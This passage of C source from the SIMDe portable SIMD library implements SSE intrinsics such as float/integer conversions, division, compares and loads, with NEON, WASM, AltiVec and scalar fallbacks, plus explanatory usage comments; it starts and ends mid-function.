simde__m128_private r_, a_ = simde__m128_to_private(a);
simde__m64_private b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(vcvt_f32_s32(b_.neon_i32),
vget_high_f32(a_.neon_f32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, b_.i32);
r_.m64_private[1] = a_.m64_private[1];
#else
r_.f32[0] = (simde_float32)b_.i32[0];
r_.f32[1] = (simde_float32)b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi32_ps(a, b) simde_mm_cvtpi32_ps((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi32x2_ps(simde__m64 a, simde__m64 b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi32x2_ps(a, b);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a),
b_ = simde__m64_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_s32(vcombine_s32(a_.neon_i32, b_.neon_i32));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.m64_private[0].f32, a_.i32);
SIMDE_CONVERT_VECTOR_(r_.m64_private[1].f32, b_.i32);
#else
r_.f32[0] = (simde_float32)a_.i32[0];
r_.f32[1] = (simde_float32)a_.i32[1];
r_.f32[2] = (simde_float32)b_.i32[0];
r_.f32[3] = (simde_float32)b_.i32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi32x2_ps(a, b) simde_mm_cvtpi32x2_ps(a, b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpi8_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpi8_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vcvtq_f32_s32(vmovl_s16(vget_low_s16(vmovl_s8(a_.neon_i8))));
#else
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[0]);
r_.f32[1] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[1]);
r_.f32[2] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[2]);
r_.f32[3] = HEDLEY_STATIC_CAST(simde_float32, a_.i8[3]);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpi8_ps(a) simde_mm_cvtpi8_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi16(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi16(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_i16 = vmovn_s32(vcvtq_s32_f32(vrndiq_f32(a_.neon_f32)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i16) / sizeof(r_.i16[0])); i++) {
r_.i16[i] = SIMDE_CONVERT_FTOI(int16_t,
simde_math_roundf(a_.f32[i]));
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi16(a) simde_mm_cvtps_pi16((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi32(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi32(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && \
defined(SIMDE_FAST_CONVERSION_RANGE) && !defined(SIMDE_BUG_GCC_95399)
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(vrndiq_f32(a_.neon_f32)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.i32) / sizeof(r_.i32[0])); i++) {
simde_float32 v = simde_math_roundf(a_.f32[i]);
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
r_.i32[i] =
((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
r_.i32[i] = SIMDE_CONVERT_FTOI(int32_t, v);
#endif
}
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi32(a) simde_mm_cvtps_pi32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtps_pi8(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtps_pi8(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V8_NATIVE) && !defined(SIMDE_BUG_GCC_95471)
/* Clamp the input to [INT8_MIN, INT8_MAX], round, convert to i32, narrow to
* i16, combine with an all-zero vector of i16 (which will become the upper
* half), narrow to i8. */
float32x4_t max =
vdupq_n_f32(HEDLEY_STATIC_CAST(simde_float32, INT8_MAX));
float32x4_t min =
vdupq_n_f32(HEDLEY_STATIC_CAST(simde_float32, INT8_MIN));
float32x4_t values =
vrndnq_f32(vmaxq_f32(vminq_f32(max, a_.neon_f32), min));
r_.neon_i8 = vmovn_s16(
vcombine_s16(vmovn_s32(vcvtq_s32_f32(values)), vdup_n_s16(0)));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(a_.f32) / sizeof(a_.f32[0])); i++) {
if (a_.f32[i] > HEDLEY_STATIC_CAST(simde_float32, INT8_MAX))
r_.i8[i] = INT8_MAX;
else if (a_.f32[i] <
HEDLEY_STATIC_CAST(simde_float32, INT8_MIN))
r_.i8[i] = INT8_MIN;
else
r_.i8[i] = SIMDE_CONVERT_FTOI(
int8_t, simde_math_roundf(a_.f32[i]));
}
/* Note: the upper half is undefined */
#endif
return simde__m64_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtps_pi8(a) simde_mm_cvtps_pi8((a))
#endif
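/* Usage sketch (illustrative only): inputs outside the int8_t range
 * saturate instead of wrapping, so 300.0f converts to 127 and -300.0f to
 * -128 in the low four lanes (the upper four lanes are undefined):
 *
 *     simde__m64 packed = simde_mm_cvtps_pi8(
 *             simde_mm_set_ps(300.0f, -300.0f, 1.0f, -1.0f));
 */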
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpu16_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpu16_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcvtq_f32_u32(vmovl_u16(a_.neon_u16));
#elif defined(SIMDE_CONVERT_VECTOR_)
SIMDE_CONVERT_VECTOR_(r_.f32, a_.u16);
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = (simde_float32)a_.u16[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpu16_ps(a) simde_mm_cvtpu16_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtpu8_ps(simde__m64 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtpu8_ps(a);
#else
simde__m128_private r_;
simde__m64_private a_ = simde__m64_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
vcvtq_f32_u32(vmovl_u16(vget_low_u16(vmovl_u8(a_.neon_u8))));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = HEDLEY_STATIC_CAST(simde_float32, a_.u8[i]);
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtpu8_ps(a) simde_mm_cvtpu8_ps(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtsi32_ss(simde__m128 a, int32_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtsi32_ss(a, b);
#else
simde__m128_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(HEDLEY_STATIC_CAST(float32_t, b),
a_.neon_f32, 0);
#else
r_ = a_;
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtsi32_ss(a, b) simde_mm_cvtsi32_ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cvtsi64_ss(simde__m128 a, int64_t b)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64)
#if !defined(__PGI)
return _mm_cvtsi64_ss(a, b);
#else
return _mm_cvtsi64x_ss(a, b);
#endif
#else
simde__m128_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(HEDLEY_STATIC_CAST(float32_t, b),
a_.neon_f32, 0);
#else
r_ = a_;
r_.f32[0] = HEDLEY_STATIC_CAST(simde_float32, b);
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtsi64_ss(a, b) simde_mm_cvtsi64_ss((a), b)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde_float32 simde_mm_cvtss_f32(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtss_f32(a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return vgetq_lane_f32(a_.neon_f32, 0);
#else
return a_.f32[0];
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_f32(a) simde_mm_cvtss_f32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvtss_si32(simde__m128 a)
{
return simde_mm_cvt_ss2si(a);
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_si32(a) simde_mm_cvtss_si32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int64_t simde_mm_cvtss_si64(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64)
#if !defined(__PGI)
return _mm_cvtss_si64(a);
#else
return _mm_cvtss_si64x(a);
#endif
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return SIMDE_CONVERT_FTOI(
int64_t, simde_math_roundf(vgetq_lane_f32(a_.neon_f32, 0)));
#else
return SIMDE_CONVERT_FTOI(int64_t, simde_math_roundf(a_.f32[0]));
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtss_si64(a) simde_mm_cvtss_si64((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_cvtt_ps2pi(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_cvtt_ps2pi(a);
#else
simde__m64_private r_;
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_CONVERSION_RANGE)
r_.neon_i32 = vcvt_s32_f32(vget_low_f32(a_.neon_f32));
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
simde_float32 v = a_.f32[i];
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
r_.i32[i] =
((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
r_.i32[i] = SIMDE_CONVERT_FTOI(int32_t, v);
#endif
}
#endif
return simde__m64_from_private(r_);
#endif
}
#define simde_mm_cvttps_pi32(a) simde_mm_cvtt_ps2pi(a)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtt_ps2pi(a) simde_mm_cvtt_ps2pi((a))
#define _mm_cvttps_pi32(a) simde_mm_cvttps_pi32((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int32_t simde_mm_cvtt_ss2si(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cvtt_ss2si(a);
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE) && defined(SIMDE_FAST_CONVERSION_RANGE)
return SIMDE_CONVERT_FTOI(int32_t, vgetq_lane_f32(a_.neon_f32, 0));
#else
simde_float32 v = a_.f32[0];
#if !defined(SIMDE_FAST_CONVERSION_RANGE)
return ((v > HEDLEY_STATIC_CAST(simde_float32, INT32_MIN)) &&
(v < HEDLEY_STATIC_CAST(simde_float32, INT32_MAX)))
? SIMDE_CONVERT_FTOI(int32_t, v)
: INT32_MIN;
#else
return SIMDE_CONVERT_FTOI(int32_t, v);
#endif
#endif
#endif
}
#define simde_mm_cvttss_si32(a) simde_mm_cvtt_ss2si((a))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvtt_ss2si(a) simde_mm_cvtt_ss2si((a))
#define _mm_cvttss_si32(a) simde_mm_cvtt_ss2si((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int64_t simde_mm_cvttss_si64(simde__m128 a)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_ARCH_AMD64) && \
!defined(_MSC_VER)
#if defined(__PGI)
return _mm_cvttss_si64x(a);
#else
return _mm_cvttss_si64(a);
#endif
#else
simde__m128_private a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
return SIMDE_CONVERT_FTOI(int64_t, vgetq_lane_f32(a_.neon_f32, 0));
#else
return SIMDE_CONVERT_FTOI(int64_t, a_.f32[0]);
#endif
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cvttss_si64(a) simde_mm_cvttss_si64((a))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_cmpord_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_cmpord_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_cmpord_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(simde_math_isnanf)
r_.u32[0] = (simde_math_isnanf(simde_mm_cvtss_f32(a)) ||
simde_math_isnanf(simde_mm_cvtss_f32(b)))
? UINT32_C(0)
: ~UINT32_C(0);
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.u32[i] = a_.u32[i];
}
#else
HEDLEY_UNREACHABLE();
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_cmpord_ss(a, b) simde_mm_cmpord_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_div_ps(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_div_ps(a, b);
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
r_.neon_f32 = vdivq_f32(a_.neon_f32, b_.neon_f32);
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32x4_t recip0 = vrecpeq_f32(b_.neon_f32);
float32x4_t recip1 =
vmulq_f32(recip0, vrecpsq_f32(recip0, b_.neon_f32));
r_.neon_f32 = vmulq_f32(a_.neon_f32, recip1);
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
r_.wasm_v128 = wasm_f32x4_div(a_.wasm_v128, b_.wasm_v128);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_div(a_.altivec_f32, b_.altivec_f32);
#elif defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
r_.f32 = a_.f32 / b_.f32;
#else
SIMDE_VECTORIZE
for (size_t i = 0; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i] / b_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_div_ps(a, b) simde_mm_div_ps((a), (b))
#endif
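/* Note (illustrative): ARMv7 NEON has no vector divide, so the A32V7
 * path above starts from a reciprocal estimate and applies one
 * Newton-Raphson refinement, since vrecpsq_f32(x, b) computes 2 - x*b:
 *
 *     recip1 = recip0 * (2 - recip0 * b)   // ~doubles the accurate bits
 *     a / b  ~= a * recip1
 *
 * AArch64 instead uses the exact vdivq_f32.
 */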
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_div_ss(simde__m128 a, simde__m128 b)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_div_ss(a, b);
#elif (SIMDE_NATURAL_VECTOR_SIZE > 0)
return simde_mm_move_ss(a, simde_mm_div_ps(a, b));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a),
b_ = simde__m128_to_private(b);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
float32_t value = vgetq_lane_f32(
simde__m128_to_private(simde_mm_div_ps(a, b)).neon_f32, 0);
r_.neon_f32 = vsetq_lane_f32(value, a_.neon_f32, 0);
#else
r_.f32[0] = a_.f32[0] / b_.f32[0];
SIMDE_VECTORIZE
for (size_t i = 1; i < (sizeof(r_.f32) / sizeof(r_.f32[0])); i++) {
r_.f32[i] = a_.f32[i];
}
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_div_ss(a, b) simde_mm_div_ss((a), (b))
#endif
SIMDE_FUNCTION_ATTRIBUTES
int16_t simde_mm_extract_pi16(simde__m64 a, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 3)
{
simde__m64_private a_ = simde__m64_to_private(a);
return a_.i16[imm8];
}
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(HEDLEY_PGI_VERSION)
#if defined(SIMDE_BUG_CLANG_44589)
#define simde_mm_extract_pi16(a, imm8) \
(HEDLEY_DIAGNOSTIC_PUSH _Pragma( \
"clang diagnostic ignored \"-Wvector-conversion\"") \
HEDLEY_STATIC_CAST(int16_t, _mm_extract_pi16((a), (imm8))) \
HEDLEY_DIAGNOSTIC_POP)
#else
#define simde_mm_extract_pi16(a, imm8) \
HEDLEY_STATIC_CAST(int16_t, _mm_extract_pi16(a, imm8))
#endif
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_extract_pi16(a, imm8) \
vget_lane_s16(simde__m64_to_private(a).neon_i16, imm8)
#endif
#define simde_m_pextrw(a, imm8) simde_mm_extract_pi16(a, imm8)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_extract_pi16(a, imm8) simde_mm_extract_pi16((a), (imm8))
#define _m_pextrw(a, imm8) simde_mm_extract_pi16((a), (imm8))
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m64 simde_mm_insert_pi16(simde__m64 a, int16_t i, const int imm8)
SIMDE_REQUIRE_CONSTANT_RANGE(imm8, 0, 3)
{
simde__m64_private r_, a_ = simde__m64_to_private(a);
r_.i64[0] = a_.i64[0];
r_.i16[imm8] = i;
return simde__m64_from_private(r_);
}
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE) && \
!defined(__PGI)
#if defined(SIMDE_BUG_CLANG_44589)
#define simde_mm_insert_pi16(a, i, imm8)                               \
(HEDLEY_DIAGNOSTIC_PUSH _Pragma( \
"clang diagnostic ignored \"-Wvector-conversion\"")( \
_mm_insert_pi16((a), (i), (imm8))) HEDLEY_DIAGNOSTIC_POP)
#else
#define simde_mm_insert_pi16(a, i, imm8) _mm_insert_pi16(a, i, imm8)
#endif
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
#define simde_mm_insert_pi16(a, i, imm8) \
simde__m64_from_neon_i16( \
vset_lane_s16((i), simde__m64_to_neon_i16(a), (imm8)))
#endif
#define simde_m_pinsrw(a, i, imm8) (simde_mm_insert_pi16(a, i, imm8))
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_insert_pi16(a, i, imm8) simde_mm_insert_pi16(a, i, imm8)
#define _m_pinsrw(a, i, imm8) simde_mm_insert_pi16(a, i, imm8)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_load_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ps(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vld1q_f32(mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
r_.altivec_f32 = vec_vsx_ld(0, mem_addr);
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
r_.altivec_f32 = vec_ld(0, mem_addr);
#else
simde_memcpy(&r_, SIMDE_ALIGN_ASSUME_LIKE(mem_addr, simde__m128),
sizeof(r_));
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ps(mem_addr) simde_mm_load_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_load1_ps(simde_float32 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ps1(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vld1q_dup_f32(mem_addr);
#else
r_ = simde__m128_to_private(simde_mm_set1_ps(*mem_addr));
#endif
return simde__m128_from_private(r_);
#endif
}
#define simde_mm_load_ps1(mem_addr) simde_mm_load1_ps(mem_addr)
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ps1(mem_addr) simde_mm_load1_ps(mem_addr)
#define _mm_load1_ps(mem_addr) simde_mm_load1_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_load_ss(simde_float32 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_load_ss(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vsetq_lane_f32(*mem_addr, vdupq_n_f32(0), 0);
#else
r_.f32[0] = *mem_addr;
r_.i32[1] = 0;
r_.i32[2] = 0;
r_.i32[3] = 0;
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_load_ss(mem_addr) simde_mm_load_ss(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_loadh_pi(simde__m128 a, simde__m64 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE) && defined(SIMDE_X86_MMX_NATIVE)
return _mm_loadh_pi(a,
HEDLEY_REINTERPRET_CAST(__m64 const *, mem_addr));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(
vget_low_f32(a_.neon_f32),
vld1_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr)));
#else
simde__m64_private b_ =
*HEDLEY_REINTERPRET_CAST(simde__m64_private const *, mem_addr);
r_.f32[0] = a_.f32[0];
r_.f32[1] = a_.f32[1];
r_.f32[2] = b_.f32[0];
r_.f32[3] = b_.f32[1];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#if HEDLEY_HAS_WARNING("-Wold-style-cast")
#define _mm_loadh_pi(a, mem_addr) \
simde_mm_loadh_pi((a), HEDLEY_REINTERPRET_CAST(simde__m64 const *, \
(mem_addr)))
#else
#define _mm_loadh_pi(a, mem_addr) \
simde_mm_loadh_pi((a), (simde__m64 const *)(mem_addr))
#endif
#endif
/* The SSE documentation says that there are no alignment requirements
   for mem_addr. Unfortunately they used the __m64 type for the argument,
   which is supposed to be 8-byte aligned, so some compilers (like clang
   with -Wcast-align) will generate a warning if you try to cast, say,
   a simde_float32* to a simde__m64* for this function.
   I think the choice of argument type is unfortunate, but I do think we
   need to stick to it here. If there is demand I can always add something
   like simde_x_mm_loadl_f32(simde__m128, simde_float32 mem_addr[2]). */
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_mm_loadl_pi(simde__m128 a, simde__m64 const *mem_addr)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadl_pi(a,
HEDLEY_REINTERPRET_CAST(__m64 const *, mem_addr));
#else
simde__m128_private r_, a_ = simde__m128_to_private(a);
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vcombine_f32(
vld1_f32(HEDLEY_REINTERPRET_CAST(const float32_t *, mem_addr)),
vget_high_f32(a_.neon_f32));
#else
simde__m64_private b_;
simde_memcpy(&b_, mem_addr, sizeof(b_));
r_.i32[0] = b_.i32[0];
r_.i32[1] = b_.i32[1];
r_.i32[2] = a_.i32[2];
r_.i32[3] = a_.i32[3];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#if HEDLEY_HAS_WARNING("-Wold-style-cast")
#define _mm_loadl_pi(a, mem_addr) \
simde_mm_loadl_pi((a), HEDLEY_REINTERPRET_CAST(simde__m64 const *, \
(mem_addr)))
#else
#define _mm_loadl_pi(a, mem_addr) \
simde_mm_loadl_pi((a), (simde__m64 const *)(mem_addr))
#endif
#endif
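/* Usage sketch (illustrative only): per the note above, a warning-free
 * way to feed two floats from a plain array is to copy them into a
 * simde__m64 first instead of casting the pointer:
 *
 *     float lo[2] = { 1.0f, 2.0f };
 *     simde__m64 tmp;
 *     simde_memcpy(&tmp, lo, sizeof(tmp));
 *     v = simde_mm_loadl_pi(v, &tmp);  // v is some simde__m128 in scope
 */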
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_loadr_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadr_ps(mem_addr);
#else
simde__m128_private r_,
v_ = simde__m128_to_private(simde_mm_load_ps(mem_addr));
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 = vrev64q_f32(v_.neon_f32);
r_.neon_f32 = vextq_f32(r_.neon_f32, r_.neon_f32, 2);
#elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE) && defined(__PPC64__)
r_.altivec_f32 = vec_reve(v_.altivec_f32);
#elif defined(SIMDE_SHUFFLE_VECTOR_)
r_.f32 = SIMDE_SHUFFLE_VECTOR_(32, 16, v_.f32, v_.f32, 3, 2, 1, 0);
#else
r_.f32[0] = v_.f32[3];
r_.f32[1] = v_.f32[2];
r_.f32[2] = v_.f32[1];
r_.f32[3] = v_.f32[0];
#endif
return simde__m128_from_private(r_);
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_loadr_ps(mem_addr) simde_mm_loadr_ps(mem_addr)
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128
simde_mm_loadu_ps(simde_float32 const mem_addr[HEDLEY_ARRAY_PARAM(4)])
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_loadu_ps(mem_addr);
#else
simde__m128_private r_;
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
r_.neon_f32 =
